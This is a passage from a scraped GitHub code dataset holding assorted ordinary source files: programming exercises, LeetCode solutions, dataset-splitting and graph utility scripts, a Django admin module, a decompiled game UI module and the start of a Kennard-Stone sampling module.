Your application must check whether the given expression has its\r\n# parentheses opened and closed in the correct order.\r\n#\r\n# GUANABARA'S SOLUTION #\r\n\r\n# n = input('Digite uma expressão: ')\r\n# contador1 = n.count('(')\r\n# contador2 = n.count(')')\r\n# if contador1 != contador2:\r\n# print('Erro na expressão.')\r\n# else:\r\n# print('Expressão válida.')\r\n\r\nexpr = str(input('Digite a expressão: '))\r\npilha = []\r\nfor simb in expr:\r\n if simb == '(':\r\n pilha.append('(')\r\n elif simb == ')':\r\n if len(pilha) > 0:\r\n pilha.pop()\r\n else:\r\n pilha.append(')')\r\n break\r\nif len(pilha) == 0:\r\n print('Solução válida.')\r\nelse:\r\n print('Solução inválida.')","repo_name":"luan661/Cursoemvideo-exercicios","sub_path":"ex083.py","file_name":"ex083.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29609400882","text":"import os\nimport random\nimport shutil\n\n\ndata_folder = \"./data/cropped\"\ntrain_out_folder = \"./data/train\"\ntest_out_folder = \"./data/test\"\neval_folder = \"./data/eval\"\n\ndef sufficient_images(individual_name, amount):\n # check if at least amount images are available for the individual\n folder_path = os.path.join(data_folder, individual_name)\n return len(os.listdir(folder_path)) >= amount\n\ndef copy_to(individuals, dest_folder):\n # copies all these individuals to the destination folder\n for individual in individuals:\n shutil.copytree(os.path.join(data_folder,individual), os.path.join(dest_folder,individual))\n\nindividuals = [name for name in os.listdir(data_folder) if os.path.isdir(os.path.join(data_folder,name)) and sufficient_images(name, 3)]\nimage_count = sum([1 for individual in individuals for s in os.listdir(os.path.join(data_folder, individual))])\nprint(\"Total images after removing individuals with too few samples: \", image_count)\namount_test = round(0.1 * len(individuals))\nrandom.shuffle(individuals)\ncopy_to(individuals[:amount_test], test_out_folder)\ncopy_to(individuals[amount_test:], train_out_folder)\namount_eval = round(0.05 * sum([1 for individual in os.listdir(test_out_folder) for s in os.listdir(os.path.join(test_out_folder, individual))]))\nprint(\"Eval:\", amount_eval)\n\nindividuals_test = individuals[:amount_test]\nif not os.path.exists(eval_folder):\n os.mkdir(eval_folder)\nfor i in range(0, amount_eval):\n while True:\n individual = random.sample(individuals_test, 1)[0]\n individual_path = os.path.join(test_out_folder, individual)\n # only pick a sample if at least 3 images are still left for the individual afterwards\n if len(os.listdir(individual_path)) < 4:\n continue\n individual_samples = [name for name in os.listdir(individual_path) if os.path.splitext(name)[1] in [\".jpg\", \".jpeg\", \".png\"]]\n sample = random.sample(individual_samples, 1)[0]\n if not os.path.exists(os.path.join(eval_folder, individual)):\n os.mkdir(os.path.join(eval_folder, individual))\n shutil.move(os.path.join(individual_path, sample), os.path.join(eval_folder, individual, sample))\n break\n","repo_name":"Lasklu/gorillavision","sub_path":"scripts/split_train_test_eval.py","file_name":"split_train_test_eval.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"9273681451","text":"# LeetCode 19\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\n\n
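# Two-pointer gap technique: p2 leads p1 by n nodes, so when p2 reaches the end\n# of the list, p1 sits just before the node that must be removed.\n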
# Time Complexity : O(n)\n# Space Complexity : O(1)\nclass Solution:\n def removeNthFromEnd(self, head, n: int):\n\n # if there is one element, return None\n if not head.next:\n return None\n \n # start both pointers at head\n p1 = head\n p2 = head\n \n # increment fast pointer by n\n for i in range(n):\n p2 = p2.next\n \n # traverse to the end of the linked list\n while p2 and p2.next:\n p1 = p1.next\n p2 = p2.next\n \n # if p2 is None, return p1.next\n if not p2:\n return p1.next\n \n # get the next value\n skip = p1.next.next\n # apply the skip\n p1.next = skip\n \n # return the head\n return head","repo_name":"gelbling/LeetCode-Solutions","sub_path":"remove_nth_node_from_end_of_list.py","file_name":"remove_nth_node_from_end_of_list.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"15425687328","text":"import random\r\n\r\nimport cv2\r\nimport numpy as np\r\n\r\n\r\ndef color_space_error(img, num_percent = 0.6):\r\n # B, G, R = cv2.split(img)\r\n y_cb_img = cv2.cvtColor(img, cv2.COLOR_BGR2YCrCb)#cv2.merge([Y, Cr, Cb])\r\n Y, Cr, Cb = cv2.split(y_cb_img)\r\n height, width, _ = img.shape\r\n num = int(height * width * num_percent)\r\n pixel_position = random.sample(range(0, height * width), num)\r\n for pos in pixel_position:\r\n Y[(pos // width) - 1, pos % width] -= 16 \r\n Cr[(pos // width) - 1, pos % width] -= 128\r\n Cb[(pos // width) - 1, pos % width] -= 128 \r\n dst = cv2.merge([Y, Cr, Cb])\r\n output_img = cv2.cvtColor(dst, cv2.COLOR_YCrCb2BGR)\r\n return output_img\r\n\r\n# '''\r\n#test\r\nsrc = cv2.imread(\"../VOCdevkit/VOC2007/JPEGImages/000000.jpg\")\r\ncv2.imshow('original img', src)\r\nblack_src = color_space_error(src, 0.8)\r\ncv2.imshow('color img1', black_src)\r\nblack_src = color_space_error(src, 1)\r\ncv2.imshow('color img2', black_src)\r\ncv2.waitKey(0)\r\n# '''\r\n","repo_name":"realcorruption/image-noise-pattern","sub_path":"CSC-D.py","file_name":"CSC-D.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72352984410","text":"import numpy as np\nimport dgl\nimport torch\nimport os\nimport json\n\ndef mark_rel_importance(g,entype = 'vul'):\n for srctype, etype, dsttype in g.canonical_etypes:\n g.edges[etype].data['rd'] = 0\n\n\ndef attribute_degree(g,kg, entype,path ):\n path = path + 'attr_degree.json'\n if os.path.exists(path):\n print(\"Load Node Degree from: \", path)\n with open(path) as f:\n df = json.load(f)\n for ntype in g.ntypes:\n if ntype != entype:\n g.nodes[ntype].data['d1'] = torch.FloatTensor(df[ntype]['d1']).reshape(len(df[ntype]['d1']),1)\n g.nodes[ntype].data['d2'] = torch.FloatTensor(df[ntype]['d2']).reshape(len(df[ntype]['d2']),1)\n g.nodes[ntype].data['d'] = torch.FloatTensor(df[ntype]['d']).reshape(len(df[ntype]['d']),1)\n # print( g.nodes[ntype].data['d1'] )\n print(\"Success: load node degree\")\n else:\n df = {}\n for srctype, etype, dsttype in g.canonical_etypes:\n if 'of' in etype:\n df[srctype] = {'d1':[],'d2':[],'d':[]}\n # attributes in a type\n g.nodes[srctype].data['d1'] = torch.zeros((g.number_of_nodes(srctype),1))\n g.nodes[srctype].data['d2'] = torch.zeros((g.number_of_nodes(srctype), 1))\n g.nodes[srctype].data['d'] = torch.zeros((g.number_of_nodes(srctype), 1))\n for i in range(g.number_of_nodes(srctype)):\n succ = g.successors(i, etype)\n # print(\"Etype:{}, Src Type:{}, Successors:{}\".format(etype, srctype, succ))\n
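 # d1 counts successors below kg.splitvulid, d2 those at or above it; d is the total degree.\n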
 g.nodes[srctype].data['d1'][i] = len([x for x in succ if x < kg.splitvulid])\n g.nodes[srctype].data['d2'][i] = len([x for x in succ if x >= kg.splitvulid])\n g.nodes[srctype].data['d'][i] = g.nodes[srctype].data['d1'][i] + g.nodes[srctype].data['d2'][i]\n # print(\">>\", type(g.nodes[srctype].data['d1'][0]), type(g.nodes[srctype].data['d1']))\n for k in df[srctype].keys():\n df[srctype][k] = [int(x) for x in g.nodes[srctype].data[k]]\n # print(g.nodes[srctype].data['d1'])\n\n with open(path, 'w') as f:\n json.dump(df, f, indent=4)\n print('Save node degree at:',path)\n\ndef get_candidates(g,kg,entype, path):\n import pickle\n path = path + 'candidates.pkl'\n if os.path.exists(path):\n with open(path,'rb') as f:\n g_candidates = pickle.load(f)\n print(\"Success: load candidates\")\n else:\n print('Generate candidates...')\n g_candidates = []\n num_en = g.number_of_nodes(entype)\n for i in range(num_en):\n if i%100 ==0: print(i, i/num_en*100,'%')\n candidates = []\n maxcount = 0\n for srctype, etype, dsttype in g.canonical_etypes:\n if srctype == entype and ('product' in etype or 'vendor' in etype): #etype.replace('has_','') in kg.critical_etypes :\n neighbors = g.successors(i, etype)\n reverse_etype = etype.replace('has_','') + ('_of')\n for n in neighbors:\n can = g.successors(n,reverse_etype)\n for c in can:\n if c not in candidates:\n candidates.append(c)\n # if candidates.count(c)>maxcount:maxcount =candidates.count(c)\n\n # candidates = [x for x in candidates if candidates.count(x)==maxcount]\n if i < kg.splitvulid: candidates = [x for x in candidates if x!= i and x >= kg.splitvulid]\n else:candidates = [x for x in candidates if x!= i and x < kg.splitvulid]\n candidates = list(candidates)\n g_candidates.append(candidates)\n\n with open(path, 'wb') as f:\n # json.dump(df, f, indent=4)\n pickle.dump(g_candidates,f)\n\n return g_candidates\n\ndef get_graph_id(kg, data):\n id_a, id_b = data[:, 0], data[:, 1]\n #print(kg.id2idg['a'].keys())\n\n idg_a = np.array([kg.id2idg['a'][x] for x in id_a])\n idg_b = np.array([kg.id2idg['b'][x] for x in id_b])\n\n return idg_a, idg_b\n\n\ndef get_neighborhood(g, dst):\n frontier = dgl.in_subgraph(g, [dst])\n return np.array(frontier.edges()[0])\n\ndef get_edge_mirror(g,kg):\n # print('Get mirror dst for each edge...')\n neighbor = [get_neighborhood(g, i) for i in range(g.num_nodes())]\n # print(neighbor)\n g_mirror= []\n for src,dst in zip(g.edges()[0],g.edges()[1]):\n m_srcs = []\n # print(kg.entity_type[dst])\n if kg.entity_type[dst]!='id':\n\n g_mirror.append(m_srcs)\n continue\n # print('src:',src,'dst:',dst)\n n = list(neighbor[dst])\n # print('neighbor of dst:',n)\n n.pop(n.index(src))\n # print('exclusive neighbor of dst',n)\n\n if n:\n m_dsts = get_neighborhood(g, n[0])\n for node in n:\n m_dsts = list(np.intersect1d(m_dsts,get_neighborhood(g, node)))\n if dst in m_dsts:\n m_dsts.pop(m_dsts.index(dst))\n\n for m_dst in m_dsts:\n for j in get_neighborhood(g, m_dst):\n if kg.entity_type[j] == kg.entity_type[src]:\n m_srcs.append(j)\n g_mirror.append(m_srcs)\n # if m_srcs:\n # print(src,dst,m_srcs)\n # print('mirror center:',ce)\n\n # print(\"g_mirror\",g_mirror)\n return np.array(g_mirror, dtype=object)\n","repo_name":"yqyzyaq/CEAM","sub_path":"code/utils/mask.py","file_name":"mask.py","file_ext":"py","file_size_in_byte":5553,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"72095580571","text":"import numpy as np\nimport matplotlib.pyplot as plt\n## EXERCISE 1\ncero=[]\nuno=[]\ncinco=[]\nfor i in range(10):\n cero.append(0)\n uno.append(1)\n
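 # three constant rows of length 10 that feed the 3x10 array built below\n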
 cinco.append(5)\n\na=np.array([cero,uno,cinco])\n#print(a)\n\n\n## EXERCISE 3\ndef PrintMat(mat):\n for i in range(np.size(mat, axis=0)):\n for j in range(np.size(mat, axis=1)):\n print(mat[i][j],end=' ')\n print('')\n \n#PrintMat(np.array([(1,2,3,4),(5,6,7,8),(9,0,1,2)]))\n\n\n## EXERCISE 4\na=np.array([(1,2,3),(5,6,7),(0,1,2)])\n#print(np.linalg.inv(a))\n\n\n## EXERCISE 5\nciudad=['Liverpool','Manchester','Londres','Cardiff']\npopu=[100,150,500,80]\n\nindex=np.arange(len(ciudad)) #=[0,1,2,3]\n\nplt.scatter(index,popu,color='green')\nplt.bar(index,popu,color='blue')\nplt.xlabel('City')\nplt.ylabel('Population')\n\nplt.xticks(index,ciudad)\n\n#plt.show()\n","repo_name":"Tiagosalco/Struct","sub_path":"Guias/Guia6/Ejs6.py","file_name":"Ejs6.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42074516739","text":"from django.contrib import admin\n\nfrom products.models import (\n Product,\n ProductCategory,\n ProductCategoryFaq,\n ProductFaq,\n ProductImage,\n ProductProvider,\n ProductCategoryImage,\n)\n\n\n@admin.register(ProductCategory)\nclass ProductCategoryAdmin(admin.ModelAdmin):\n list_display = (\n 'title',\n 'sub_title',\n 'priority',\n 'is_active',\n 'is_upcoming',\n 'is_deliverable',\n 'created_at',\n 'updated_at',\n )\n list_filter = (\n 'is_active',\n 'is_upcoming',\n 'is_deliverable',\n 'created_at',\n 'updated_at',\n )\n search_fields = ('title', 'sub_title',)\n readonly_fields = ('slug', )\n\n\n@admin.register(ProductCategoryImage)\nclass ProductCategoryImageAdmin(admin.ModelAdmin):\n list_display = (\n 'category',\n 'image',\n 'is_approved',\n 'created_at',\n 'updated_at',\n )\n list_filter = (\n 'category',\n 'is_approved',\n 'created_at',\n 'updated_at',\n )\n search_fields = ('category__title',)\n\n\n@admin.register(ProductCategoryFaq)\nclass ProductCategoryFaqAdmin(admin.ModelAdmin):\n list_display = (\n 'category',\n 'question',\n 'answer',\n 'created_at',\n 'updated_at',\n )\n list_filter = (\n 'category',\n 'created_at',\n 'updated_at',\n )\n search_fields = ('category__title',)\n\n\n@admin.register(Product)\nclass ProductAdmin(admin.ModelAdmin):\n list_display = (\n 'title',\n 'category',\n 'priority',\n 'price',\n 'offer_price',\n 'is_active',\n 'list_product',\n 'custom_product',\n 'created_at',\n 'updated_at',\n )\n list_filter = (\n 'category',\n 'is_active',\n 'list_product',\n 'custom_product',\n 'created_at',\n 'updated_at',\n )\n search_fields = ('category__title', 'title')\n\n\n@admin.register(ProductImage)\nclass ProductImageAdmin(admin.ModelAdmin):\n list_display = (\n 'product',\n 'image',\n 'is_approved',\n 'created_at',\n 'updated_at',\n )\n list_filter = (\n 'is_approved',\n 'created_at',\n 'updated_at',\n )\n search_fields = ('product__title', )\n\n\n@admin.register(ProductFaq)\nclass ProductFaqAdmin(admin.ModelAdmin):\n list_display = (\n 'product',\n 'question',\n 'answer',\n 'created_at',\n 'updated_at',\n )\n list_filter = (\n 'product',\n 'created_at',\n 'updated_at',\n )\n search_fields = ('product__title',)\n\n\n@admin.register(ProductProvider)\nclass ProductProviderAdmin(admin.ModelAdmin):\n list_display = (\n 'product',\n 'user',\n 'price',\n 'offer_price',\n 'new_offer_price',\n 'is_approved',\n 'created_at',\n 'updated_at',\n )\n list_filter = (\n 'is_approved',\n 'created_at',\n 'updated_at',\n )\n search_fields = (\n 'product__title',\n 'user__first_name',\n 'user__last_name',\n 'user__email',\n 'user__phone',\n
)\n","repo_name":"ajaygupta74/django","sub_path":"ecommerce/products/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":3131,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"37106019304","text":"import sys\n\nn=int(sys.stdin.readline())\narr=[]\nfor i in range(n):\n arr.append(list(sys.stdin.readline()))\ncolumn=0\nrow=0\nfor i in range(n):\n base=0\n for j in range(n):\n if arr[i][j]=='.':\n base+=1\n else:\n if base>=2:\n row+=1\n base=0\n if base>=2:\n row+=1\nfor i in range(n):\n base=0\n for j in range(n):\n if arr[j][i]=='.':\n base+=1\n else:\n if base>=2:\n column+=1\n base=0\n if base>=2:\n column+=1\n \nprint(row,column)\n","repo_name":"styughjvbn/Algorithm_study","sub_path":"week11-20/week16/148_1652.py","file_name":"148_1652.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26432346880","text":"def compare(x, y):\n if x > y:\n print(1)\n elif x == y:\n print(0)\n else:\n print(-1)\n\n\nvalue_1 = int(input(\"Please enter first number: \"))\nvalue_2 = int(input(\"Please enter second number: \"))\n\ncompare(value_1, value_2)\n","repo_name":"fibbo/python_basics","sub_path":"previous_courses/21FS_APPE3/exercise1.py","file_name":"exercise1.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3585283706","text":"from django.urls import resolve, reverse\nfrom django.db.models import Sum, Avg\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom django.utils.encoding import smart_str\n\n\ndef build_tabs_dict(request, tabs):\n match = resolve(request.path)\n tab_dict = {}\n for tab,view in tabs.items():\n try:\n view_name, args, kwargs = view\n is_active = match.url_name == view_name\n except ValueError:\n is_active = match.url_name == view\n kwargs = None\n args = []\n view_name = view\n tab_dict[tab] = [reverse(view_name, args=args, kwargs=kwargs), is_active]\n return tab_dict\n\n","repo_name":"wjojf/ngsdb","sub_path":"nlib/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"43451134813","text":"# SOA Exam GIADV\n# Lee\nfrom sympy import symbols, solve\nimport numpy as np\nclass Excess_Loss_and_Retro_Rating:\n # 1 Introduction\n # Size and Layer\n # G(x) = 1 - F(x)\n\n # 2 Expected Value Premium\n # Increased Limits Coverage\n # Excess of Loss Coverage\n # Losses with Retention and Limit\n \n # 3 Trend\n # Effect of Inflation\n\n def __init__(self): \n self.Layers = []\n self.ExcessAmounts = [] \n self.Trend = 0\n self.TrendFactors = []\n self.Loss_Ratios = np.array([])\n \n def set_losses_probabilities(self, losses, probabilities): \n self.TrendFactors = []\n for layer, excess in zip(self.Layers, self.ExcessAmounts): \n layerExcessLoss = 0\n trendedLayerExcessLoss = 0\n for loss, prob in zip(losses, probabilities):\n layerExcessLoss += prob * min(max(loss - layer, 0), excess) \n trendedLayerExcessLoss += prob * min(max(loss * (1 + self.Trend) - layer,0), excess) \n #print(f'Trend Factor {trendedLayerExcessLoss / layerExcessLoss}')\n self.TrendFactors.append(trendedLayerExcessLoss / layerExcessLoss) \n\n # The entry ratio: The multiple of a risk’s expected loss or expected loss ratio\n\n\n # 4 Retrospective 
Rating\n # Table M charge: The average amount by which a risk’s actual loss exceeds r times its expected loss, divided by its expected loss \n # Table L charge: The average amount by which a risk’s actual limited loss exceeds r times its expected loss, divided by its expected loss\n def Φ(self, r, k = 0):\n avg_loss_ratio = self.Loss_Ratios.mean() / (1 - k) \n expected_excess = (self.Loss_Ratios - r * avg_loss_ratio).clip(0,1) \n return expected_excess.mean() / avg_loss_ratio + k # add loss_elimination_ratio, k\n\n # Table M saving: The average amount by which a risk’s actual loss falls short of r times its expected loss, divided by its expected loss\n # Table L saving: The average amount by which a risk’s actual limited loss falls short of r times its expected loss, divided by its expected loss\n def Ψ(self, r, k = 0):\n avg_loss_ratio = self.Loss_Ratios.mean() / (1 - k) \n expected_saving = (r * avg_loss_ratio - self.Loss_Ratios).clip(0,1) \n return expected_saving.mean() / avg_loss_ratio \n\n \n def workers_compensation_retro_rating(self):\n b = symbols('basic premium') \n B = symbols('basic premium ratio')\n P = symbols('premium')\n\n b = B * P\n \n R = symbols('retro rating')\n C = symbols('loss conversion factor (LCF)')\n L = symbols('loss')\n\n R = b + C * L\n\n G = symbols('max premium')\n H = symbols('min premium')\n E = symbols('expected loss')\n L_G = symbols('max loss')\n L_H = symbols('min loss')\n\n G = b + C * L_G\n r_G = L_G / E\n\n H = b + C * L_H\n r_H = L_H / E\n\n I = symbols('the net insurance charge of Table M')\n \n \n # 5 Conclusion","repo_name":"LittleBigGene/SOA_Advanced-Topics-in-General-Insurance-Exam","sub_path":"3 Excess of Loss Coverages and Retrospectiva Rating/Excess_Loss_and_Retro_Rating.py","file_name":"Excess_Loss_and_Retro_Rating.py","file_ext":"py","file_size_in_byte":3170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27339955572","text":"import time\n\n\nclass Solution:\n def firstLastInList(self, nums, target):\n first = self.binarySearch2(nums, 0, len(nums) - 1, target, True)\n last = self.binarySearch2(nums, 0, len(nums)-1, target, False)\n return [first, last]\n\n def binarySearch(self, nums, low, high, target, isFirst):\n index = None\n while low <= high:\n midIndex = (high + low) // 2\n if(target == nums[midIndex]):\n if isFirst:\n index = midIndex\n high = midIndex - 1\n else:\n index = midIndex\n low = midIndex + 1\n elif target > nums[midIndex]:\n low = midIndex + 1\n else:\n high = midIndex - 1\n return index\n\n def binarySearchRe(self, nums, low, high, target, isFirst):\n if low > high:\n return -1\n midIndex = (high + low) // 2\n if(isFirst):\n if(nums[midIndex] == target and (midIndex == 0 or nums[midIndex - 1] < target)):\n return midIndex\n if target > nums[midIndex]:\n return self.binarySearchRe(nums, midIndex + 1, high, target, isFirst)\n else:\n return self.binarySearchRe(nums, low, midIndex - 1, target, isFirst)\n else:\n if(nums[midIndex] == target and (midIndex == len(nums) - 1 or target < nums[midIndex+1])):\n return midIndex\n elif target < nums[midIndex]:\n return self.binarySearchRe(nums, low, midIndex - 1, target, False)\n else:\n return self.binarySearchRe(nums, midIndex + 1, high, target, False)\n\n def binarySearch2(self, nums, low, high, target, isFirst):\n while True:\n if high < low:\n return -1\n midIndex = (high + low) // 2\n if isFirst:\n
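 # first occurrence: a match counts only at index 0 or when the previous element is smaller\n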
 if(nums[midIndex] == target and (midIndex == 0 or nums[midIndex - 1] < target)):\n return midIndex\n if target > nums[midIndex]:\n low = midIndex + 1\n else:\n high = midIndex - 1\n else:\n if(nums[midIndex] == target and (midIndex == len(nums) - 1 or target < nums[midIndex+1])):\n return midIndex\n elif target < nums[midIndex]:\n high = midIndex - 1\n else:\n low = midIndex + 1\n\n\n# a sorted list\na = [1, 2, 3, 5, 7, 9, 18]\nprint(Solution().firstLastInList(a, 7))\n","repo_name":"liuuu/python-algorithm","sub_path":"5.first_last_in_list.py","file_name":"5.first_last_in_list.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"25514761066","text":"\n\n'''\n\n743. Network Delay Time\n\nYou are given a network of n nodes, labeled from 1 to n. You are also given times, a list of travel times as directed edges times[i] = (ui, vi, wi), where ui is the source node, vi is the target node, and wi is the time it takes for a signal to travel from source to target.\n\nWe will send a signal from a given node k. Return the time it takes for all the n nodes to receive the signal. If it is impossible for all the n nodes to receive the signal, return -1.\n'''\n\nimport collections\nimport heapq\nfrom typing import List\n\n\nclass Solution:\n def networkDelayTime(self, times: List[List[int]], n: int, k: int) -> int:\n\n # Create an edges variable that will store the edges with their weight and value\n edges = collections.defaultdict(list)\n\n for u, v, w in times: # Loop through all vars in times and add it to our default dict\n edges[u].append((v, w)) # Node 2 -> 1 has a weight of 1\n\n minHeap = [(0, k)] # Init minheap with 0 cost and source node given\n visit = set() # Our visited nodes will be tracked in a set\n t = 0 # Our min total for each node to be reached\n\n while minHeap: # Continue this algorithm while our minHeap is not empty\n # pop from the minheap and store it as weight 1 and node 1\n w1, n1 = heapq.heappop(minHeap)\n if n1 in visit: # If node has been visited we want to continue\n continue\n\n visit.add(n1) # Else we want to add node into our visited set\n # our total is equal to the max between what t currently is and the weight from our current node\n t = max(t, w1)\n\n for n2, w2 in edges[n1]: # Now we check neighboring edges of the node we are on\n if n2 not in visit: # If neighbor node is not in visit\n # We add the node into our minHeap and add its weight AND the weight of the previous node that we used to get here\n heapq.heappush(minHeap, (w1 + w2, n2))\n return t if len(visit) == n else -1\n '''At the end of our loop we want to return t which stores our shortest path\n if the length of visit is equal to n which stores our total nodes. If it is \n equal we have completed our algorithm and we have visited each node. 
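(This is Dijkstra's algorithm with lazy deletion; the min-heap gives a running time of roughly O(E log V).) 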
If it \n is not equal it means one or more nodes were not reached and we return -1\n '''\n","repo_name":"shayanvalaie/leetcode_sample","sub_path":"743_network_delay_time.py","file_name":"743_network_delay_time.py","file_ext":"py","file_size_in_byte":2359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33636804493","text":"#Embedded file name: c:/depot/games/branches/release/EVE-TRANQUILITY/carbon/client/script/ui/uiProcs.py\nimport cameras\nimport GameWorld\nimport service\nimport zaction\n\nclass UIProcSvc(service.Service):\n __guid__ = 'svc.uiProcSvc'\n __machoresolve__ = 'location'\n __dependencies__ = ['cameraClient']\n\n def Run(self, *args):\n service.Service.Run(self, *args)\n GameWorld.RegisterPythonActionProc('PerformPythonUICallback', self._PerformUICallback, ('callbackKey',))\n GameWorld.RegisterPythonActionProc('PlayEntityAudio', self._PlayEntityAudio, ('audioName', 'mls', 'TargetList'))\n GameWorld.RegisterPythonActionProc('PlayTutorialVoiceover', self._PlayTutorialVoiceOver, ('messageKey',))\n GameWorld.RegisterPythonActionProc('PushCameraWithTransition', self._PushCameraWithTransition, ('cameraName', 'behaviorNames', 'transitionSeconds', 'startHeight', 'TargetList'))\n GameWorld.RegisterPythonActionProc('PopCameraWithTransition', self._PopCameraWithTransition, ('transitionSeconds', 'retainYaw', 'retainPitch'))\n\n def _PushCameraWithTransition(self, cameraName, behaviorNames, transitionSeconds, startHeight, targetList):\n entity = self.entityService.FindEntityByID(targetList[0])\n cameraClass = getattr(cameras, cameraName)\n camera = cameraClass()\n camera.pushUp = startHeight\n if hasattr(camera, 'SetEntity'):\n camera.SetEntity(entity)\n names = behaviorNames.split(',')\n for name in names:\n name = name.replace(' ', '')\n if len(name):\n behaviorClass = getattr(cameras, name)\n behavior = behaviorClass()\n camera.AddBehavior(behavior)\n\n transition = cameras.LinearTransitionBehavior(transitionSeconds=float(transitionSeconds))\n self.cameraClient.PushActiveCamera(camera, transitionBehaviors=[transition])\n return True\n\n def _PopCameraWithTransition(self, transitionSeconds, retainYaw, retainPitch):\n activeCamera = self.cameraClient.GetActiveCamera()\n cameraStack = self.cameraClient.GetCameraStack()\n comingActiveCamera = None\n try:\n comingActiveCamera = cameraStack[-2]\n except IndexError:\n comingActiveCamera = None\n\n if comingActiveCamera:\n if retainYaw:\n comingActiveCamera.SetYaw(activeCamera.yaw)\n if retainPitch:\n comingActiveCamera.SetPitch(activeCamera.pitch)\n transition = cameras.LinearTransitionBehavior(transitionSeconds=float(transitionSeconds))\n self.cameraClient.PopActiveCamera(transitionBehaviors=[transition])\n return True\n\n def _PerformUICallback(self, callbackKey):\n raise NotImplementedError('Each game must implement a _PerformUICallback that works with its UI.')\n\n def _PlayEntityAudio(self, audioName, mls, targetList):\n if mls:\n message = cfg.GetMessage(audioName)\n audioName = message.audio\n if audioName.startswith('wise:/'):\n audioName = audioName[6:]\n for entityID in targetList:\n entity = self.entityService.FindEntityByID(entityID)\n audioComponent = entity.GetComponent('audioEmitter')\n if audioComponent:\n audioComponent.emitter.SendEvent(unicode(audioName))\n else:\n self.LogWarn('Entity with ID %s has no audio component. Audio file %s cannot be played from this entity.' 
% (entityID, audioName))\n\n return True\n\n def _PlayTutorialVoiceOver(self, messageKey):\n sm.GetService('tutorial').Action_Play_MLS_Audio(messageKey)\n return True\n\n\nexports = {'actionProcTypes.PerformPythonUICallback': zaction.ProcTypeDef(isMaster=True, procCategory='UI', properties=[zaction.ProcPropertyTypeDef('callbackKey', 'S', userDataType=None, isPrivate=True)], description='Performs a UI callback (opens a UI window, etc.). These are set per-game.'),\n 'actionProcTypes.PlayEntityAudio': zaction.ProcTypeDef(isMaster=True, procCategory='Audio', properties=[zaction.ProcPropertyTypeDef('audioName', 'S', userDataType=None, isPrivate=True, displayName='Audio Name'), zaction.ProcPropertyTypeDef('mls', 'B', userDataType=None, isPrivate=True, displayName='MLS')], description='Plays location-based audio at the location of the *target* entity.'),\n 'actionProcTypes.PlayTutorialVoiceover': zaction.ProcTypeDef(isMaster=True, procCategory='Audio', properties=[zaction.ProcPropertyTypeDef('messageKey', 'S', userDataType=None, isPrivate=True, displayName='MLS Message Key')], description='Plays the specified tutorial voiceover.'),\n 'actionProcTypes.PushCameraWithTransition': zaction.ProcTypeDef(isMaster=True, procCategory='Camera', properties=[zaction.ProcPropertyTypeDef('cameraName', 'S', userDataType=None, isPrivate=True, displayName='Camera Class Name'),\n zaction.ProcPropertyTypeDef('behaviorNames', 'S', userDataType=None, isPrivate=True, displayName='Behavior Class Names (comma separ.)'),\n zaction.ProcPropertyTypeDef('transitionSeconds', 'F', userDataType=None, isPrivate=True, displayName='Transition Seconds'),\n zaction.ProcPropertyTypeDef('startHeight', 'F', userDataType=None, isPrivate=True, displayName='Start Height From Floor')], description='Pushes a new camera onto the camera stack. THIS MAY BE DEPRECATED.'),\n 'actionProcTypes.PopCameraWithTransition': zaction.ProcTypeDef(isMaster=True, procCategory='Camera', properties=[zaction.ProcPropertyTypeDef('transitionSeconds', 'F', userDataType=None, isPrivate=True, displayName='Transition Seconds'), zaction.ProcPropertyTypeDef('retainYaw', 'B', userDataType=None, isPrivate=True, displayName='Retain yaw between cameras'), zaction.ProcPropertyTypeDef('retainPitch', 'B', userDataType=None, isPrivate=True, displayName='Retain pitch between cameras')], description='Pops a camera off the camera stack with a transition. THIS MAY BE DEPRECATED.')}","repo_name":"alexcmd/eve","sub_path":"eve-8.21.494548/carbon/client/script/ui/uiProcs.py","file_name":"uiProcs.py","file_ext":"py","file_size_in_byte":6072,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"} +{"seq_id":"14341676511","text":"'''\nSample selection using Kennard-Stone algorithm and SPXY algorithm\ncode adapted from https://hxhc.xyz/post/kennardstone-spxy/#spxy-split\nAlgorithm based on\nGalvao, Roberto Kawakami Harrop, et al. \"A method for calibration and validation subset partitioning.\" Talanta 67.4 (2005): 736-740.\nLi, Wenze, et al. \"HSPXY: A hybrid‐correlation and diversity‐distances based data partition method.\" Journal of Chemometrics 33.4 (2019): e3109\n'''\n\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom scipy.spatial.distance import cdist\n\n\ndef random_split(spectra, test_size=0.25, random_state=None, shuffle=True, stratify=None):\n 